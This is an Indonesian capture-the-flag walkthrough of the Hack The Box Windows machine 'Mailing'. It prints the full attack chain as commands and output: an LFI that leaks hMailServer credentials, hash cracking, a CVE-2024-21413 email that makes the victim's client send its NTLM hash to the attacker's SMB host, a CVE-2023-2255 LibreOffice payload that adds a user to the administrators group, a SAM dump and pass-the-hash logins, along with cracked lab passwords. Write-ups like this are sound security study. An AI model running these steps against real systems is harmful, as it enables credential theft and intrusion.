๐ฉMailing
By replican
Mailing Windows ยท Easy
USer Tldr
LFI on Port 80
Cracking hash password of the hMailServer admin email creds
zero click account leak outlook
Root tldr
LibreOffice CVE-2023-2255
Dump sam creds
User Flag
pertama kita scan pakai nmap ipnya
# Nmap 7.94 scan initiated Thu May 16 02:37:04 2024 as: nmap -sC -sV --verbose -oN reports_10.129.231.40 10.129.231.40
Nmap scan report for 10.129.231.40
Host is up (0.064s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after: 2029-10-06T18:24:10
| MD5: bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-15T19:37:36
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 02:38:16 2024 -- 1 IP address (1 host up) scanned in 71.32 seconds
terdapat smb,imap,pop3, dan http terbuka
lgsg aja masuk ke initial discovery ke port 80 nya kita set dlu di /etc/hosts
10.129.231.40 mailing.htbnah kita tau ini pakai hmailserver
First user initial foothold
lgsg aja search exploitnya dan dpt kalo vuln lfi : https://www.exploit-db.com/exploits/7012
tapi pas di cek gada. lgsg aja kita coba pakai dirsearch
200 31B http://mailing.htb/download.phpnah ada download.php lgsg kita masukin payloadnya
nah di exploit db sebenrnya pakai program files doang karna program files doang itu gada 404 kita coba di x86 program files dan ada. ke download
cat hMailServer.INI
โโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ File: hMailServer.INI
โโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1 โ [Directories]
2 โ ProgramFolder=C:\Program Files (x86)\hMailServer
3 โ DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
4 โ DataFolder=C:\Program Files (x86)\hMailServer\Data
5 โ LogFolder=C:\Program Files (x86)\hMailServer\Logs
6 โ TempFolder=C:\Program Files (x86)\hMailServer\Temp
7 โ EventFolder=C:\Program Files (x86)\hMailServer\Events
8 โ [GUILanguages]
9 โ ValidLanguages=english,swedish
10 โ [Security]
11 โ AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
12 โ [Database]
13 โ Type=MSSQLCE
14 โ Username=
15 โ Password=0a9f8ad8bf896b501dde74f08efd7e4c
16 โ PasswordEncryption=1
17 โ Port=0
18 โ Server=
19 โ Database=hMailServer
20 โ Internal=1
โโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโmasukin ke file buat kita crack
cat administrator.hash
โโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ File: administrator.hash
โโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1 โ 841bb5acfa6779ae432fd7a4e6600ba7
โโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโsudo john administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt --format=Raw-Md5
[sudo] password for replican:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
homenetworkingadministrator (?)
1g 0:00:00:00 DONE (2024-05-16 04:39) 3.030g/s 22915Kp/s 22915Kc/s 22915KC/s homepc..homeiyun88
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completednah kita dapet deh creds emailnya yaitu
administrator@mailing.htb:homenetworkingadministrator
Second user initial foothold
balik ke port 80 tadi dan buka instruction.pdf nya ( download tombol paling bwh )
disini kita tau kalo kita ngesend email nanti sama maya auto diliat ( kita asumsi ada bot buat auto ngeliat setiap message baru )
disini lgsg terpikirkan exploit yg baru2 ini ada di email services outlook. ( gw jg tau nya dari htb forum dikasih hint :v )
lgsg aja pakai responder dan cve nya buat gaining zero click account leak
kalo yg gatau apa itu responder itu buat dpetin creds nya maya abis kita ngesend emailnya
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.45" --subject XD[SMB] NTLMv2-SSP Client : 10.129.231.40
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:e6a1aa4dfd95ab9f:546ECAE13A0B53BB1E7F662632271430:010100000000000000E3947642A7DA01E6A5C7F43A9AF34D000000000200080032004D005300510001001E00570049004E002D00360033005A003900390041004E004F0059005100580004003400570049004E002D00360033005A003900390041004E004F005900510058002E0032004D00530051002E004C004F00430041004C000300140032004D00530051002E004C004F00430041004C000500140032004D00530051002E004C004F00430041004C000700080000E3947642A7DA0106000400020000000800300030000000000000000000000000200000B5B650195CCF25DA9E362F08460DF10A6043234F3B80DE71CD2B446A1F46FF9D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340035000000000000000000nah di responder dapet deh creds hash nya si maya, tinggal kita crack lagi pake hashcat kali ini pakai mode 5600
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 491 MB
Dictionary cache hit:
* Filename..: /home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f662632271430:010100000000000000e3947642a7da01e6a5c7f43a9af34d000000000200080032004d005300510001001e00570049004e002d00360033005a003900390041004e004f0059005100580004003400570049004e002d00360033005a003900390041004e004f005900510058002e0032004d00530051002e004c004f00430041004c000300140032004d00530051002e004c004f00430041004c000500140032004d00530051002e004c004f00430041004c000700080000e3947642a7da0106000400020000000800300030000000000000000000000000200000b5b650195ccf25da9e362f08460df10a6043234f3b80de71cd2b446a1f46ff9d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340035000000000000000000:m4y4ngs4ri
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f...000000
Time.Started.....: Thu May 16 03:42:48 2024 (1 sec)
Time.Estimated...: Thu May 16 03:42:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19633.9 kH/s (3.17ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7340032/14344384 (51.17%)
Rejected.........: 0/7340032 (0.00%)
Restore.Point....: 5505024/14344384 (38.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: minterwint -> ina-123456
Hardware.Mon.#1..: Temp: 52c Fan: 49% Util: 19% Core:1837MHz Mem:7300MHz Bus:16
Started: Thu May 16 03:42:42 2024
Stopped: Thu May 16 03:42:49 2024 dan dpet deh lgsg login pakai evil-winrm
evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ridan ke desktop dapet user flag
Root Flag
First root initial foothold
kita cek list program files
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program
"C:/Program Files (x86)/" "C:/Program Files/" "C:/ProgramData"
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program Files/"
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/"
"C:/Program Files/LibreOffice/CREDITS.fodt" "C:/Program Files/LibreOffice/help/" "C:/Program Files/LibreOffice/program/"
"C:/Program Files/LibreOffice/LICENSE.html" "C:/Program Files/LibreOffice/license.txt" "C:/Program Files/LibreOffice/readmes/"
"C:/Program Files/LibreOffice/NOTICE" "C:/Program Files/LibreOffice/presets/" "C:/Program Files/LibreOffice/share/"
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en"
Cannot find path 'C:\Program Files\LibreOffice\readmes\readme_en' because it does not exist.
At line:1 char:1
+ cat "C:/Program Files/LibreOffice/readmes/readme_en"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Program File...admes\readme_en:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en-US.txt"
======================================================================
LibreOffice 7.4 ReadMeversi 7.4 Libreoffice : https://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'fungsinya biar maya ada di group admin dan bisa ngedump creds sam
nah abis itu taruh di C:\Important Documents
Second root initial foothold
user maya jadi punya group administrator lgsg aja dump creds nya si localadmin
command : crackmapexec smb 10.129.231.40 -u maya -p m4y4ngs4ri --sam
SMB 10.129.231.40 445 MAILING [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.231.40 445 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB 10.129.231.40 445 MAILING [*] Dumping SAM hashes
SMB 10.129.231.40 445 MAILING Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.40 445 MAILING WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB 10.129.231.40 445 MAILING localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB 10.129.231.40 445 MAILING maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB 10.129.231.40 445 MAILING [+] Added 6 SAM hashes to the databasedapet deh tinggal login lgi pake winrm
evil-winrm -i 10.129.231.40 -u localadmin -H "9aa582783780d1546d62f2d102daefae"done, tinggal ke desktop lgi dan ada root flag
Last updated
